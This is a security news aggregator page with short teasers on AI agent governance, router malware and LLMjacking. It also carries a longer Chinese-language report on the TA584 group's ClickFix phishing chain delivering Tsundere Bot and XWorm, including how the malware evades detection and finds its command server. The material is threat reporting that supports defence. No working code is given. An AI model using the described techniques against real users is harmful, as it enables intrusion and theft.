Aggregator

Allama is an open-source security automation platform that lets teams build visual workflows for threat detection and response. It includes integrations with 80+ types of tools and services typical in security operations, including SIEM systems, endpoint detection and response products, identity providers, and ticketing systems. The project supports alerts from many sources. Once alerts enter the platform, it uses a workflow engine and AI agents to enrich, triage, and act on the data. The integrations … More →

The post Allama: Open-source AI security automation appeared first on Help Net Security.

Security and governance approaches to autonomous AI agents rely on static credentials, inconsistent controls, and limited visibility. Securing these agents requires the same rigor and traceability applied to human users, according to Cloud Security Alliance’s Securing Autonomous AI Agents report. Agents scale faster than governance frameworks Autonomous AI agents act on behalf of humans, accessing data and making decisions with business impact. Organizations are deploying them across production environments, pilots, tests, and broader AI or … More →

The post AI agents behave like users, but don’t follow the same rules appeared first on Help Net Security.

Security analysts at Cisco Talos have unmasked a clandestine offensive platform that has operated surreptitiously within network infrastructure

The post Shattering the Edge: Cisco Talos Unmasks “DKnife,” the 7-Module Framework Hijacking Your Router appeared first on Penetration Testing Tools.

A big "thank you" to everyone who helped me troubleshoot the problem with my "Print Screen" button on the new PC. Try as we all might, none of us could figure out why it refused to bind to SnagIt and instead insisted on dumping the entire

The European Union is increasingly championing the doctrine of “digital sovereignty,” articulating a pressing necessity to attenuate its

The post Vault Lines vs. Fault Lines: Europe’s 2026 Mandate to Break Free from Big Tech Dependencies appeared first on Penetration Testing Tools.

代号为TA584的高活跃度初始访问中间商近期被发现，正利用Tsundere Bot与XWorm远程访问木马获取目标网络访问权限，为后续勒索软件攻击创造条件。

自2020年以来，Proofpoint研究人员便持续追踪TA584的活动。他们指出，该威胁组织近期大幅扩大攻击规模，并构建了一套可规避静态检测的持续性攻击链。

Tsundere Bot恶意软件于去年首次由卡巴斯基公开披露，研究人员将其归属至一个与123 Stealer窃密木马相关联的俄语系攻击组织。尽管该恶意软件最初的攻击目的与传播途径尚不明确，但Proofpoint表示，其可用于信息收集、数据窃取、横向移动以及部署额外恶意载荷。 

鉴于研究人员已观测到TA584在攻击中使用该恶意软件，所以研究团队高度确信，遭受Tsundere Bot感染的主机极有可能成为后续勒索软件攻击的目标。

2025年末，TA584的攻击活动总量较同年第一季度增长两倍，攻击范围也从传统的北美、英国及爱尔兰地区，进一步扩展至德国、欧洲多国及澳大利亚。

TA584活动的数量

该组织当前主流攻击链流程如下：首先利用数百个遭劫持的老旧邮箱账户，通过SendGrid与亚马逊简易邮件服务（SES）发送钓鱼邮件；邮件包含针对不同目标的专属链接，并设置地理围栏与IP过滤机制，跳转链路中通常会引入Keitaro等第三方流量分发系统（TDS）。

通过过滤机制的用户会进入人机验证（CAPTCHA）页面，随后跳转至ClickFix页面，页面会诱导用户在本地执行一条PowerShell命令。

CAPTCHA (左) 和 ClickFix (右) 页面

该命令会下载并执行一段经过混淆处理的脚本，将XWorm或Tsundere Bot加载至内存中，同时将浏览器重定向至正常网站以掩盖恶意行为。

PowerShell 脚本

Proofpoint表示，多年来TA584在攻击中使用过大量恶意载荷，包括Ursnif、LDR4、WarmCookie、Xeno RAT、Cobalt Strike以及DCRAT，其中DCRAT在2025年的一起攻击事件中仍被使用。

Tsundere Bot是一款具备后门与加载器功能的恶意软件即服务（MaaS）平台，运行依赖Node.js环境，该环境会通过其命令与控制（C2）面板生成的安装程序自动部署到受害者设备中。

该恶意软件采用改进版EtherHiding技术，从以太坊区块链中获取C2服务器地址，安装程序中同时内置硬编码备用地址，以防主地址失效。 

恶意软件通过WebSocket协议与C2服务器通信，并内置系统区域检测逻辑：若检测到设备使用独立国家联合体（CIS）成员国语言（以俄语为主），则立即终止运行。 

此外，Tsundere Bot会收集系统信息以构建受感染主机画像，可执行从C2服务器下发的任意JavaScript代码，并支持将受感染主机作为SOCKS代理使用。该恶意软件平台还内置交易市场，可直接进行木马程序的买卖交易。

An adversary successfully infiltrated an Amazon Web Services cloud environment, escalating to full administrative privileges in a mere

The post The 8-Minute Admin: How AI-Powered “LLMjacking” Crushed AWS Defenses in Record Time appeared first on Penetration Testing Tools.

Security analysts at ReliaQuest have unmasked a sophisticated phishing campaign wherein adversaries secrete remote access mechanisms within an

The post The Fatal Screensaver: ReliaQuest Unmasks Phishing That Uses .scr Files to Decapitate EDR appeared first on Penetration Testing Tools.